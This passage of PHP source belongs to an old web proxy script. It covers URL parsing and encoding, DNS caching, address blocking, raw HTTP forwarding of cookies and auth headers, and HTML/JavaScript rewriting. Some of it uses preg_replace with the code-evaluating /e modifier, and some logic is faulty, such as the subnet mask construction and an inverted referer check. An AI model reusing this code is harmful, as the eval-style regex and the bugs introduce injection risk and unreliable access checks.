define('REGEXP_SCRIPT_ONEVENT',"( on[a-z]{3,20}=(?:\"[^\"]+\"|'[^']+'|[^\"' >][^ >]+[^\"' >])| href=(?:\"{$anyspace}javascript:[^\"]+\"|'{$anyspace}javascript:[^']+'|{$anyspace}javascript:[^\"' >][^ >]+[^\"' >]))");

unset($jsattrs,$jshookattrs,$jsmethods,$jslochost,$htmlattrs,
      $anyspace,$plusspace,$operands,$notoperands,
      $quoteseg,$regseg,
      $jsvarsect,$jsobjsect,$jsvarobj,$jsquotesect,$jsquotereg,
      $notjsvarsect,
      $jsend,$notjsend,$jsbegin,$jsbeginright,
      $htmlnoquot,$htmlnoquotnoqm,$htmlreg,$xmlhttpreq,$jsnewobj,$formnotpost,$frametargets,
      $js_string_methods,$js_string_attrs,
      $js_regexp_arrays
);

# }}}

# }}}

# PROXY FUNCTIONS {{{

# PROXY FUNCTIONS: AURL CLASS {{{

# class for URL
class aurl{
	var $url,$topurl,$locked;
	var $proto,$userpass,$servername,$portval,$path,$file,$query,$label;

	function aurl($url,$topurl=null){

		if(strlen($url)>MAXIMUM_URL_LENGTH) $this->url=null;
		else $this->url=preg_replace('/&#([0-9]+);/e','chr(\1)',trim(str_replace('&amp;','&',str_replace(chr(13),null,str_replace(chr(10),null,$url)))));
		$this->topurl=$topurl;

		$this->determine_locked();
		if($this->locked) return;

		$urlwasvalid=true;
		if(!preg_match(URLREG,$this->url)){
			$urlwasvalid=false;
			if($this->topurl==null) $this->url='http://'.(($this->url{0}==':' || $this->url{0}=='/')?substr($this->url,1):$this->url).(strpos($this->url,'/')!==false?null:'/');
			#if($this->topurl==null) $this->url='http://'.preg_replace("/^:?\/{0,2}/","",$this->url).(strpos($this->url,'/')!==false?null:'/');
			else{
				$newurl=$this->topurl->get_proto().$this->get_fieldreq(2,$this->topurl->get_userpass()).$this->topurl->get_servername().(($this->topurl->get_portval()!=80 && ($this->topurl->get_proto()=='https'?$this->topurl->get_portval()!=443:true))?':'.$this->topurl->get_portval():null);
				if($this->url{0}!='/') $newurl.=$this->topurl->get_path();
				$this->url=$newurl.$this->url;
			}
		}

		$this->set_proto(($urlwasvalid || $this->topurl==null?preg_replace('/^([^:\/]*).*$/','\1',$this->url):$this->topurl->get_proto()));
		$this->set_userpass(preg_replace(URLREG,'\2',$this->url));
		$this->set_servername(preg_replace(URLREG,'\3',$this->url));
		$this->set_portval(preg_replace(URLREG,'\4',$this->url));
		$this->set_path(preg_replace(URLREG,'\5',$this->url));
		$this->set_file(preg_replace(URLREG,'\6',$this->url));
		$this->set_query(preg_replace(URLREG,'\7',$this->url));
		$this->set_label(preg_replace(URLREG,'\8',$this->url));

		if(!$this->locked && !preg_match(URLREG,$this->url)) havok(7,$this->url); #*
	}

	function determine_locked(){ $this->locked=preg_match(AURL_LOCK_REGEXP,$this->url)>0; } #*

	function get_fieldreq($fieldno,$value){
		$fieldreqs=array(2 => '://'.($value!=null?"$value@":null), 4 => ($value!=null && intval($value)!=80?':'.intval($value):null), 7 => ($value!=null?"?$value":null), 8 => ($value!=null?"#$value":null));
		if(!array_key_exists($fieldno,$fieldreqs)) return (empty($value)?null:$value);
		else return $fieldreqs[$fieldno];
	}

	function set_proto($proto=''){ if($this->locked) return; $this->proto=(!empty($proto)?$proto:'http'); }
	function get_proto(){ return $this->proto; }
	function get_userpass(){ return $this->userpass; }
	function set_userpass($userpass=null){ $this->userpass=$userpass; }
	function get_servername(){ return $this->servername; }
	function set_servername($servername=null){ $this->servername=$servername; }
	function get_portval(){ return (empty($this->portval)?($this->get_proto()=='https'?'443':'80'):$this->portval); }
	function set_portval($port=null){ $this->portval=strval((intval($port)!=80)?$port:null); }
	function get_path(){
		if(strpos($this->path,'/../')!==false) $this->path=preg_replace('/(?:\/[^\/]+){0,1}\/\.\.\//','/',$this->path);
		if(strpos($this->path,'/./')!==false) while(($path=str_replace('/./','/',$this->path)) && $path!=$this->path) $this->path=$path;
		return $this->path;
	}
	function set_path($path=null){ $this->path=(empty($path)?'/':$path); }
	function get_file(){ return $this->file; }
	function set_file($file=null){ $this->file=$file; }
	function get_query(){ return $this->query; }
	function set_query($query=null){ $this->query=$query; }
	function get_label(){ return $this->label; }
	function set_label($label=null){ $this->label=$label; }

	function get_url($withlabel=true){
		if($this->locked) return $this->url;
		return $this->get_proto().'://'.
		       ($this->get_userpass()==null?null:$this->get_userpass().'@').
		       $this->get_servername().
		       (($this->get_proto()=='https' && intval($this->get_portval())==443) || intval($this->get_portval())==80?null:':'.intval($this->get_portval())).
		       $this->get_path().$this->get_file().
		       ($this->get_query()==null?null:'?'.$this->get_query()).
		       ($withlabel && $this->get_label()==null?null:'#'.$this->get_label())
		;
	}

	function surrogafy(){
		$label=$this->get_label();
		$this->set_label();
		$url=$this->get_url();
		$this->set_label($label);

		#$this->determine_locked();
		if($this->locked) return $url;
		# || $this->get_proto().$this->get_fieldreq(2,$this->get_userpass()).$this->get_servername().$this->get_path().$this->get_file()==THIS_SCRIPT) return $url;

		if(ENCRYPT_URLS && !$this->locked) $url=proxenc($url);
		#$url=THIS_SCRIPT.'?='.(!ENCRYPT_URLS?urlencode($url):$url).(!empty($label)?"#$label":null); # urlencoded
		$url=THIS_SCRIPT."?={$url}".(!empty($label)?"#$label":null);
		return $url;
	}
} 

# }}}

# PROXY FUNCTIONS: URL PARSING {{{
function surrogafy_url($url,$topurl=false,$addproxy=true){
	global $curr_urlobj;
	//if(preg_match('/^(["\']).*\1$/is',$url)>0){
	if(($url{0}=='"' && substr($url,-1)=='"') || ($url{0}=='\'' && substr($url,-1)=='\'')){
		$urlquote=$url{0};
		$url=substr($url,1,strlen($url)-2);
	}
	if($topurl===false) $topurl=$curr_urlobj;
	$urlobj=new aurl($url,$topurl);
	$new_url=($addproxy?$urlobj->surrogafy():$urlobj->get_url());
	if(!empty($urlquote)) $new_url="{$urlquote}{$new_url}{$urlquote}";
	return $new_url;
}

function framify_url($url,$frame_type=false){
	if(($frame_type!==PAGETYPE_FRAME_TOP || !URL_FORM) && ($frame_type!==PAGETYPE_FRAMED_PAGE && !PAGE_FRAMED)) return $url;
	//if(preg_match('/^(["\']).*\1$/is',$url)>0){
	if(($url{0}=='"' && substr($url,-1)=='"') || ($url{0}=='\'' && substr($url,-1)=='\'')){
		$urlquote=$url{0};
		$url=substr($url,1,strlen($url)-2);
	}
	if(preg_match(FRAME_LOCK_REGEXP,$url)<=0){
		if($frame_type===PAGETYPE_FRAME_TOP && URL_FORM) $query='&=';
		elseif($frame_type===PAGETYPE_FRAMED_CHILD) $query='.&=';
		elseif($frame_type===PAGETYPE_FRAMED_PAGE || PAGE_FRAMED) $query='_&=';
		else $query=null;
		$url=preg_replace('/^([^\?]*)[\?]?'.PAGETYPE_MINIREGEXP.'([^#]*?[#]?.*?)$/',"\\1?={$query}\\3",$url,1);
	}
	if(!empty($urlquote)) $url="{$urlquote}{$url}{$urlquote}";
	return $url;
}

function proxenc($url){
	if($url{0}=='~' || strtolower(substr($url,0,3))=='%7e') return $url;
	$url=urlencode($url);
	$new_url=null;
	for($i=0;$i<strlen($url);$i++){
		$char=ord($url{$i});
		$char+=ord(substr(SESS_PREF,$i%strlen(SESS_PREF),1));
		while($char>126) $char-=94;
		$new_url.=chr($char);
	}
	#return '~'.base64_encode($new_url);
	return '~'.urlencode(base64_encode($new_url));
}

# }}}

# PROXY FUNCTIONS: ERRORS & EXITING {{{

function finish_noexit(){
	global $dns_cache_array;
	# save DNS Cache before exiting
	$_SESSION['DNS_CACHE_ARRAY']=$dns_cache_array;
}

function finish(){
	finish_noexit();
	exit();
}

function havok($errorno,$arg1=null,$arg2=null,$arg3=null){
	global $curr_url;
	$url=$curr_url;
	switch($errorno){
		case 1:
			$et='Bad IP Address';
			$ed="The IP address given ({$arg2}) is an impossible IP address, or the domain given ({$arg1}) was resolved to an impossible IP address.";
			break;
		case 2:
			$et='Address is Blocked';
			$ed="The administrator of this proxy service has decided to block this address, domain, or subnet.\n<br /><br />\nDomain: {$arg1}\n<br />\nAddress: {$arg2}";
			break;
		case 3:
			$et='Could Not Resolve Domain';
			$ed="The domain of the URL given ({$arg1}) could not be resolved due to DNS issues or an errorneous domain name.";
			break;
		case 4:
			$et='Bad Filters';
			$ed='The administrator of this proxy has incorrectly configured his domain filters, or a domain given could not be resolved.';
			break;
		case 5:
			$et='Domain is Blocked';
			$ed='The administrator of this proxy has decided to block this domain.';
			break;
		case 6:
			$et='Could Not Connect to Server';
			$ed="An error has occurred while attempting to connect to \"{$arg1}\" on port \"{$arg2}\".";
			break;
		case 7:
			$et='Invalid URL';
			$ed='The URL below was detected to be an invalid URL.';
			$url=$arg1;
			break;
	}
	$ed.="\n<br /><br />\nURL:&nbsp;{$url}";
?>
<div style="font-family: bitstream vera sans, trebuchet ms"><div style="border: 3px solid #FFFFFF; padding: 2px">
	<div style="float: left; border: 1px solid #602020; padding: 1px; background-color: #FFFFFF">
	<div style="float: left; background-color: #801010; color: #FFFFFF; font-weight: bold; font-size: 54px; padding: 2px; padding-left: 12px; padding-right: 12px">!</div>
	</div>
	<div style="float: left; width: 500px; padding-left: 20px">
		<div style="border-bottom: 1px solid #000000; font-size: 12pt; text-align: center; font-weight: bold; padding: 2px">Error: <?php echo($et); ?></div>
		<div style="padding: 6px"><?php echo($ed); ?></div>
	</div>
</div></div>
<?php finish(); }

# }}}

# PROXY FUNCTIONS: TCP/IP {{{

function ipbitter($ipaddr){
	$ipsplit=explode('.',$ipaddr);
	for($i=0;$i<4;$i++){
		$ipsplit[$i]=decbin($ipsplit[$i]);
		$ipsplit[$i]=str_repeat('0',8-strlen($ipsplit[$i])).$ipsplit[$i];
	}
	return implode(null,$ipsplit);
}

function ipcompare($iprange,$ip){
	$iprarr=split('/',$iprange);
	$ipaddr=$iprarr[0];
	$mask=$iprarr[1];
	$maskbits=str_repeat('1',$mask).str_repeat('0',$mask);
	$ipbits=ipbitter($ipaddr);
	$ipbits2=ipbitter($ip);
	return (($ipbits & $maskbits)==($ipbits2 & $maskbits));
}

function ip_check($ip,$mask=false){
	$ipseg='(?:[01]?[0-9]{1,2}|2(?:5[0-5]|[0-4][0-9]))';
	return preg_match("/^(?:$ipseg\.){0,3}$ipseg".($mask?'\/[0-9]{1,2}':null).'$/i',$ip); #*
}

function gethostbyname_cacheit($address){
	global $dns_cache_array;
	$ipaddr=gethostbyname($address);
	$dns_cache_array[$address]=array('time'=>time(), 'ipaddr'=>$ipaddr);
	return $ipaddr;
}

function gethostbyname_cached($address){
	global $dns_cache_array;
	if(isset($dns_cache_array[$address])) return $dns_cache_array[$address]['ipaddr'];
	return gethostbyname_cacheit($address);
}

function get_check($address){
	global $blocked_addresses;
	if(strrchr($address,'/')) $address=substr(strrchr($address,'/'),1);
	$ipc=ip_check($address);
	$addressip=(ip_check($address)?$address:gethostbyname_cached($address));
	if(!ip_check($addressip)) havok(1,$address,$addressip);
	foreach($blocked_addresses as $badd){
		if(!$ipc) if(strlen($badd)<=strlen($address) && substr($address,strlen($address)-strlen($badd),strlen($badd))==$badd) havok(5);
		if($badd==$addressip) havok(2,$address,$addressip);
		elseif(ip_check($badd,true)){ if(ipcompare($badd,$addressip)) havok(2,$address,$addressip); }
		else{
			$baddip=gethostbyname_cached($badd);
			if(empty($baddip)) havok(4);
			if($baddip==$addressip) havok(2,$address,$addressip);
		}
	}
	return $addressip;
}

# }}}

# PROXY FUNCTIONS: HTTP {{{

function httpclean($str){ return str_replace(' ','+',preg_replace('/([^":\-_\.0-9a-z ])/ie','\'%\'.(strlen(dechex(ord(\'\1\')))==1?\'0\':null).strtoupper(dechex(ord(\'\1\')))',$str)); }

function getpage($url){
	global $headers,$out,$post_vars,$proxy_variables,$referer;

	$urlobj=new aurl($url);
	$query=$urlobj->get_query();
	$requrl=$urlobj->get_path().$urlobj->get_file().(!empty($query)?"?{$query}":null);

	$http_auth=null;
	if(extension_loaded('apache')){
		$fail=false;
		$cheaders=getallheaders();
		$http_auth=$reqarray['Authorization'];
	}
	else $fail=true;

	$authorization=($fail?$_SERVER['HTTP_AUTHORIZATION']:$cheaders['Authorization']);
	$cache_control=($fail?$_SERVER['HTTP_CACHE_CONTROL']:$cheaders['Cache-Control']);
	$if_modified=($fail?$_SERVER['HTTP_IF_MODIFIED_SINCE']:$cheaders['If-Modified-Since']);
	$if_none_match=($fail?$_SERVER['HTTP_IF_NONE_MATCH']:$cheaders['If-None-Match']);

	if($fail){
		if(!empty($authorization)) $http_auth=$authorization;
		elseif(!empty($_SERVER['PHP_AUTH_USER']) && !empty($_SERVER['PHP_AUTH_PW']))
			$http_auth='Basic '.base64_encode("{$_SERVER['PHP_AUTH_USER']}:{$_SERVER['PHP_AUTH_PW']}");
		elseif(!empty($_SERVER['PHP_AUTH_DIGEST'])) $http_auth="Digest {$_SERVER['PHP_AUTH_DIGEST']}";
	}

	if(PIP!=null && PPORT!=null){
		$servername=PIP;
		$ipaddress=get_check(PIP);
		$portval=PPORT;
		$requrl=$urlobj->get_url(false);
	}
	else{
		$servername=$urlobj->get_servername();
		$ipaddress=($urlobj->get_proto()=='ssl' || $urlobj->get_proto()=='https'?'ssl://':null).get_check($servername);
		$portval=$urlobj->get_portval();
	}

	$out="{$_SERVER['REQUEST_METHOD']} ".str_replace(' ','%20',$requrl)." HTTP/1.1\r\nHost: ".$urlobj->get_servername().(($portval!=80 && ($urlobj->get_proto()=='https'?$portval!=443:true))?":$portval":null)."\r\n";

	global $useragent;
	$useragent=null;
	if($_COOKIE[COOK_PREF.'_useragent']!='-1'){
		$useragent=$_COOKIE[COOK_PREF.'_useragent'];
		if(empty($useragent)) $useragent=$_SERVER['HTTP_USER_AGENT'];
		$useragent_cook=($useragent==1?$_COOKIE[COOK_PREF.'_useragenttext']:$useragent);
		if(!empty($useragent_cook)) $out.="User-Agent: $useragent_cook\r\n";
	}
	if(!empty($http_auth)) $out.="Authorization: $http_auth\r\n";

	if(empty($_COOKIE[COOK_PREF.'_remove_referer']) && !empty($referer)) $out.='Referer: '.str_replace(' ','+',$referer)."\r\n";
	if($_SERVER['REQUEST_METHOD']=='POST') $out.='Content-Length: '.strlen($post_vars)."\r\nContent-Type: application/x-www-form-urlencoded\r\n";

	$cook_prefdomain=preg_replace('/^www\./i',null,$urlobj->get_servername()); #*
	$cook_prefix=str_replace('.','_',$cook_prefdomain).COOKIE_SEPARATOR;
	if(count($_COOKIE)>0 && empty($_COOKIE[COOK_PREF.'_remove_cookies'])){
		$addtoout=null;
		reset($_COOKIE);
		while(list($key,$val)=each($_COOKIE)){
			if(ENCRYPT_COOKS){
				$key=proxdec($key);
				$val=proxdec($val); #urldecode($val));
			}
			if(str_replace(COOKIE_SEPARATOR,null,$key)==$key) continue;
			#$cook_domain=preg_replace('/^(.*'.COOKIE_SEPARATOR.').*$/','\1',$key); #**
			$cook_domain=substr($key,0,strpos($key,COOKIE_SEPARATOR)).COOKIE_SEPARATOR;
			if(substr($cook_prefix,strlen($cook_prefix)-strlen($cook_domain),strlen($cook_domain))!=$cook_domain) continue;
			$key=substr($key,strlen($cook_domain),strlen($key)-strlen($cook_domain));
			if(!in_array($key,$proxy_variables)) $addtoout.=" $key=$val;";
		}
		if(!empty($addtoout)){
			$addtoout.="\r\n";
			$out.="Cookie:{$addtoout}";
		}
	}

	$out.="Accept: */*;q=0.1\r\n".
	      (GZIP_PROXY_SERVER?"Accept-Encoding: gzip\r\n":null).
	      //"Accept-Charset: ISO-8859-1,utf-8;q=0.1,*;q=0.1\r\n".
	      /*/
	      "Keep-Alive: 300\r\n".
	      "Connection: keep-alive\r\n".                          /*/
	      "Connection: close\r\n".                               //*/
	      ($cache_control!=null?"Cache-Control: $cache_control\r\n":null).
	      ($if_modified!=null?"If-Modified-Since: $if_modified\r\n":null).
	      ($if_none_match!=null?"If-None-Match: $if_none_match\r\n":null).
	      "\r\n{$post_vars}"
	;

	// This part ignores any "SSL: fatal protocol error" errors, and makes sure other errors are still triggered correctly
	function errorHandle($errno,$errmsg){
		if($errno<=E_PARSE && ($errno!=E_WARNING || substr($errmsg,-25)!='SSL: fatal protocol error')){
			restore_error_handler();
			trigger_error($errmsg,$errno<<8);
			set_error_handler('errorHandle');
		}
	}
	set_error_handler('errorHandle');

	$fp=@fsockopen($ipaddress,$portval,$errno,$errval,5) or havok(6,$servername,$portval);
	stream_set_timeout($fp,5);
	# for persistent connections, this may be necessary
	/*
	$ub=stream_get_meta_data($fp);
	$ub=$ub['unread_bytes'];
	if($ub>0) fread($fp,$ub);
	*/
	fwrite($fp,$out);

	$response='100';
	while($response=='100'){
		$responseline=fgets($fp,8192);
		$response=substr($responseline,9,3);

		$headers=array();
		while($curline!="\r\n" && $curline=fgets($fp,8192)){
			$harr=explode(':',$curline,2);
			$headers[strtolower($harr[0])][]=trim($harr[1]);
		}
	}

	#if($headers['pragma'][0]==null) header('Pragma: public');
	#if($headers['cache-control'][0]==null) header('Cache-Control: public');
	#if($headers['last-modified'][0]==null && $headers['expires']==null) header('Expires: '.date('D, d M Y H:i:s e',time()+86400));

	# read and store cookies
	if(empty($_COOKIE[COOK_PREF.'_remove_cookies'])){
		for($i=0;$i<count($headers['set-cookie']);$i++){
			$thiscook=explode('=',$headers['set-cookie'][$i],2);
			if(!strpos($thiscook[1],';')) $thiscook[1].=';';
			$cook_val=substr($thiscook[1],0,strpos($thiscook[1],';'));
			$cook_domain=preg_replace('/^.*domain=[	 ]*\.?([^;]+).*?$/i','\1',$thiscook[1]); #*
			if($cook_domain==$thiscook[1]) $cook_domain=$cook_prefdomain;
			elseif(substr($cook_prefdomain,strlen($cook_prefdomain)-strlen($cook_domain),strlen($cook_domain))!=$cook_domain) continue;
			$cook_name=str_replace('.','_',$cook_domain).COOKIE_SEPARATOR.$thiscook[0];
			if(ENCRYPT_COOKS){
				$cook_name=proxenc($cook_name);
				$cook_val=proxenc($cook_val);
			}
			dosetcookie($cook_name,$cook_val);
		}
	}

	if($response{0}=='3' && $response{1}=='0' && $response{2}!='4'){
		$urlobj=new aurl($url);
		$redirurl=framify_url(surrogafy_url($headers['location'][0],$urlobj),NEW_PAGETYPE_FRAMED_PAGE);

		fclose($fp);
		restore_error_handler();

		finish_noexit();
		header("Location: {$redirurl}");
		exit();
	}

	$oheaders=$headers;
	$oheaders['location']=$oheaders['content-length']=$oheaders['content-encoding']=
	$oheaders['set-cookie']=$oheaders['transfer-encoding']=$oheaders['connection']=
	$oheaders['keep-alive']=$oheaders['pragma']=$oheaders['cache-control']=$oheaders['expires']=null;

	while(list($key,$val)=each($oheaders)) if(!empty($val[0])) header("{$key}: {$val[0]}");
	unset($oheaders);
	header("Status: {$response}");

	if(substr($headers['content-type'][0],0,4)=='text' || substr($headers['content-type'][0],0,24)=='application/x-javascript'){
		$justoutput=false;
		$justoutputnow=false;
	}
	else{
		$justoutputnow=($headers['content-encoding'][0]=='gzip'?false:true);
		$justoutput=true;
	}

	if($headers['transfer-encoding'][0]=='chunked'){
		$body=null;
		$chunksize=null;
		while($chunksize!==0){
			$chunksize=intval(fgets($fp,8192),16);
			$bufsize=$chunksize;
			while($bufsize>=1){
				$chunk=fread($fp,$bufsize);
				if($justoutputnow) echo $chunk;
				else $body.=$chunk;
				$bufsize-=strlen($chunk);
			}
			fread($fp,2);
		}
	}

	// Content-Length stuff - commented for even more chocolatey goodness
	/*elseif($headers['content-length'][0]!=null){
		$conlen=$headers['content-length'][0];
		$body=null;
		for($i=0;$i<$conlen;$i+=$read){
			$read=($conlen-$i<8192?$conlen-$i:8192);
			$byte=fread($fp,$read);
			if($justoutputnow) echo $byte;
			else $body.=$byte;
		}
	}*/

	else{
		if(function_exists('stream_get_contents')){
			if($justoutputnow) echo stream_get_contents($fp);
			else $body=stream_get_contents($fp);
		}
		else{
			$body=null;
			while(true){
				$chunk=fread($fp,8192);
				if(empty($chunk)) break;
				if($justoutputnow) echo $chunk;
				else $body.=$chunk;
			}
		}
	}

	fclose($fp);
	restore_error_handler();

	if(GZIP_PROXY_SERVER && $headers['content-encoding'][0]=='gzip') $body=gzinflate(substr($body,10));
	if($justoutput){
		if(!$justoutputnow) echo $body;
		finish();
	}
	return array($body,$url,$cook_prefix);

}

# }}}

# }}}

# PROXY EXECUTION {{{

# PROXY EXECUTION: USER COOKIES {{{

global $proxy_variables;
$proxy_variables=array(COOK_PREF,COOK_PREF.'_pip',COOK_PREF.'_pport',COOK_PREF.'_useragent',COOK_PREF.'_useragenttext',COOK_PREF.'_url_form',COOK_PREF.'_remove_cookies',COOK_PREF.'_remove_referer',COOK_PREF.'_remove_scripts',COOK_PREF.'_remove_objects',COOK_PREF.'_encrypt_urls',COOK_PREF.'_encrypt_cooks');

if($postandget[COOK_PREF.'_set_values']){
	$proxy_varblacklist=array(COOK_PREF);
	if($postandget[COOK_PREF.'_useragent']!='1'){
		unset($postandget[COOK_PREF.'_useragenttext']);
		dosetcookie(COOK_PREF.'_useragenttext',false,0);
	}
	while(list($key,$val)=each($proxy_variables)){
		if(!in_array($val,$proxy_varblacklist)){
			dosetcookie($val,false,0);
			if(isset($postandget[$val]) && !empty($postandget[$val])) dosetcookie($val,$postandget[$val]);
		}
	}
	$theurl=framify_url(surrogafy_url(ORIG_URL),PAGETYPE_FRAME_TOP);
	#$theurl=surrogafy_url((ENCRYPT_URLS?proxdec($theurl):$theurl),null);
	header("Location: {$theurl}");
	finish();
}

# }}}

# PROXY EXECUTION: PROXY GET/POST/COOKIES {{{

define('PIP',(FORCE_DEFAULT_TUNNEL?$_COOKIE[COOK_PREF.'_pip']:DEFAULT_TUNNEL_PIP));
define('PPORT',intval(FORCE_DEFAULT_TUNNEL?$_COOKIE[COOK_PREF.'_pport']:DEFAULT_TUNNEL_PPORT));

define('ENCRYPT_COOKS',gethardattr('encrypt_cooks'));

global $referer;
if($_SERVER['HTTP_REFERER']==null){
	$refurlobj=new aurl($_SERVER['HTTP_REFERER']);
	$referer=proxdec(preg_replace('/^[\s\S]*'.COOK_PREF.'=([^&]*)[\s\S]*$/i','\1',$refurlobj->get_path())); #*
}
else $referer=null;

#$getkeys=array_keys($_GET);
#foreach($getkeys as $getvar){ if(!in_array($getvar,$proxy_variables)){ $curr_url.=(strpos($curr_url,'?')===false?'?':'&')."$getvar=".urlencode($_GET[$getvar]); } }

global $post_vars;
$post_vars=null;
$postkeys=array_keys($_POST);
foreach($postkeys as $postkey){
	if(!in_array($postkey,$proxy_variables)){
		if(!is_array($_POST[$postkey]))
			$post_vars.=($post_vars!=null?'&':null).httpclean($postkey).'='.httpclean($_POST[$postkey]);
		else{
			foreach($_POST[$postkey] as $postval)
				$post_vars.=($post_vars!=null?'&':null).httpclean($postkey).'%5B%5D='.httpclean($postval);
		}
	}
}
unset($postkeys);

# }}}

# PROXY EXECUTION: DNS CACHE {{{

if(!isset($_SESSION['DNS_CACHE_ARRAY'])) $dns_cache_array=array();
else $dns_cache_array=$_SESSION['DNS_CACHE_ARRAY'];

# purge old records from DNS cache
while(list($key,$entry)=each($dns_cache_array)){
	if($entry['time']<time()-(DNS_CACHE_EXPIRE*60)) unset($dns_cache_array[$key]);
}

# }}}

# PROXY EXECUTION: PAGE RETRIEVAL {{{

$pagestuff=getpage($curr_url);
$body=$pagestuff[0];

$tbody=trim($body);
if(($tbody{0}=='"' && substr($tbody,-1)=='"') || ($tbody{0}=='\'' && substr($tbody,-1)=='\'')){
	echo $body;
	finish();
}
unset($tbody);

$curr_url=$pagestuff[1];
define('PAGECOOK_PREFIX',$pagestuff[2]);
unset($pagestuff);
define('CONTENT_TYPE',preg_replace('/^([a-z0-9\-\/]+).*$/i','\1',$headers['content-type'][0])); #*

# }}}

# PROXY EXECUTION: PAGE PARSING {{{

if(strpos($body,'<base')){
	$base=preg_replace('/^.*'.BASE_REGEXP.'.*$/is','\1',$body);
	if(!empty($base) && $base!=$body && !empty($base{100})){
		$body=preg_replace('/'.BASE_REGEXP.'/i',null,$body);

		//preg_match('/^(["\']).*\1$/i',$base)>0
		if(($base{0}=='"' && substr($base,-1)=='"') || ($base{0}=='\'' && substr($base,-1)=='\''))
			$base=substr($base,1,strlen($base)-2); #*
		$curr_url=$base;
	}
	unset($base);
}

global $curr_urlobj;
$curr_urlobj=new aurl($curr_url);

# PROXY EXECUTION: PAGE PARSING: PARSING FUNCTIONS {{{

function parse_html($regexp,$partoparse,$html,$addproxy,$framify){
	global $curr_urlobj;
	$newhtml=null;
	while(preg_match($regexp,$html,$matcharr,PREG_OFFSET_CAPTURE)){
		$nurl=surrogafy_url($matcharr[$partoparse][0],$curr_urlobj,$addproxy);
		if($framify) $nurl=framify_url($nurl,$framify);
		$begin=$matcharr[$partoparse][1];
		$end=$matcharr[$partoparse][1]+strlen($matcharr[$partoparse][0]);
		$newhtml.=substr_replace($html,$nurl,$begin);
		$html=substr($html,$end,strlen($html)-$end);
	}
	$newhtml.=$html;
	return $newhtml;
}

function regular_express($regexp_array,$thevar){
	#$regexp_array[2].='S'; # in benchmarks, this 'optimization' appeared to not do anything at all, or possibly even slow things down
	if($regexp_array[0]==1) $newvar=preg_replace($regexp_array[2],$regexp_array[3],$thevar);
	elseif($regexp_array[0]==2){
		$addproxy=(isset($regexp_array[4])?$regexp_array[4]:true);
		$framify=(isset($regexp_array[5])?$regexp_array[5]:false);
		$newvar=parse_html($regexp_array[2],$regexp_array[3],$thevar,$addproxy,$framify);
	}
	return $newvar;
}

function parse_all_html($html){
	global $regexp_arrays;

	if(CONTENT_TYPE!='text/html'){
		for(reset($regexp_arrays);list($key,$arr)=each($regexp_arrays);){
			if($key==CONTENT_TYPE){
				foreach($arr as $regarr){
					if($regarr==null) continue;
					$html=regular_express($regarr,$html);
				}
			}
		}
		return $html;
	}

	#if(!empty($_COOKIE[COOK_PREF.'_remove_scripts'])) $splitarr=array($html);
	$splitarr=preg_split('/(<!--(?!\[if).*?-->|<style.*?<\/style>|<script.*?<\/script>)/is',$html,-1,PREG_SPLIT_DELIM_CAPTURE);
	unset($html);

	//define('REGEXP_SCRIPT_ONEVENT','( on[a-z]{3,20}=(?:"(?:[^"]+)"|\'(?:[^\']+)\'|[^"\' >][^ >]+[^"\' >]))');
	$firstrun=true;
	$firstjsrun=true;
	for(reset($regexp_arrays);list($key,$arr)=each($regexp_arrays);){
		if($key=='text/javascript') continue;

		// OPTION1: use ONLY if no Javascript REGEXPS affect HTML sections
		// and all HTML modifying Javascript REGEXPS are performed after HTML regexps
		// This gives a pretty significant speed boost
		// If used, make sure "OPTION2" lines are commented, and other "OPTION1" lines AREN'T
		if($firstjsrun && $key=='application/x-javascript'){
			if(!empty($_COOKIE[COOK_PREF.'_remove_scripts'])) break;
			$splitarr2=array();
			for($i=0;$i<count($splitarr);$i+=2){
				$splitarr2[$i]=preg_split('/'.REGEXP_SCRIPT_ONEVENT.'/is',$splitarr[$i],-1,PREG_SPLIT_DELIM_CAPTURE);
			}
		}
		// END OPTION1

		# firstrun remove scripts: on<event>s and noscript tags; also remove objects
		if($firstrun && (!empty($_COOKIE[COOK_PREF.'_remove_scripts']) || !empty($_COOKIE[COOK_PREF.'_remove_objects']))){
			for($i=0;$i<count($splitarr);$i+=2){
				if(!empty($_COOKIE[COOK_PREF.'_remove_scripts']))
					$splitarr[$i]=preg_replace('/(?:'.REGEXP_SCRIPT_ONEVENT.'|<.?noscript>)/is',null,$splitarr[$i]);
				if(!empty($_COOKIE[COOK_PREF.'_remove_objects']))
					$splitarr[$i]=preg_replace('/<(embed|object).*?<\/\1>/is',null,$splitarr[$i]);
			}
		}

		foreach($arr as $regexp_array){
			if($regexp_array==null) continue;
			for($i=0;$i<count($splitarr);$i++){

				# parse scripts for on<event>s
				if($i%2==0 && isset($splitarr2) && $regexp_array[1]==2){ // OPTION1

				// OPTION2
				//if($regexp_array[1]==2 && $i%2==0){ // OPTION2
					//$splitarr2[$i]=preg_split('/( on[a-z]{3,20}=(?:"(?:[^"]+)"|\'(?:[^\']+)\'|[^"\' >][^ >]+[^"\' >]))/is',$splitarr[$i],-1,PREG_SPLIT_DELIM_CAPTURE);
					// END OPTION2

					//if(count($splitarr2[$i])<2) $splitarr[$i]=regular_express($regexp_array,$splitarr[$i]); // UNRELATED TO OPTIONS
					if(count($splitarr2[$i])>1){
						for($j=1;$j<count($splitarr2[$i]);$j+=2){
							$begin=preg_replace('/^([^=]+=.).*$/i','\1',$splitarr2[$i][$j]);
							$quote=substr($begin,-1);
							if($quote!='"' && $quote!='\''){
								$quote=null;
								$begin=substr($begin,0,-1);
							}
							$code=preg_replace('/^[^=]+='.($quote==null?'(.*)$/i':'.(.*).$/i'),'\1',$splitarr2[$i][$j]);
							if(substr($code,0,11)=='javascript:'){
								$begin.='javascript:';
								$code=substr($code,11);
							}
							if($firstjsrun) $code=";{$code};";
							$splitarr2[$i][$j]=$begin.regular_express($regexp_array,$code).$quote;
						}
						//$splitarr[$i]=implode(null,$splitarr2[$i]); // OPTION2
					}
				}

				# remove scripts
				elseif($firstrun && !empty($_COOKIE[COOK_PREF.'_remove_scripts']) && strtolower(substr($splitarr[$i],0,7))=='<script')
					$splitarr[$i]=null;

				# parse valid stuff
				elseif(($i%2==0 && $regexp_array[1]==1) || ($regexp_array[1]==2 && strtolower(substr($splitarr[$i],0,7))=='<script') || ($key=='text/css' && strtolower(substr($splitarr[$i],0,6))=='<style')){
					$splitarr[$i]=regular_express($regexp_array,$splitarr[$i]);
				}

				# script purge cleanup
				if($firstrun && empty($_COOKIE[COOK_PREF.'_remove_scripts']) && strtolower(substr($splitarr[$i],-9))=='</script>' && !preg_match('/^[^>]*src/i',$splitarr[$i])){
					$splitarr[$i]=preg_replace('/'.END_OF_SCRIPT_TAG.'$/i',';'.COOK_PREF.'.purge();//--></script>',$splitarr[$i]);
				}

			}

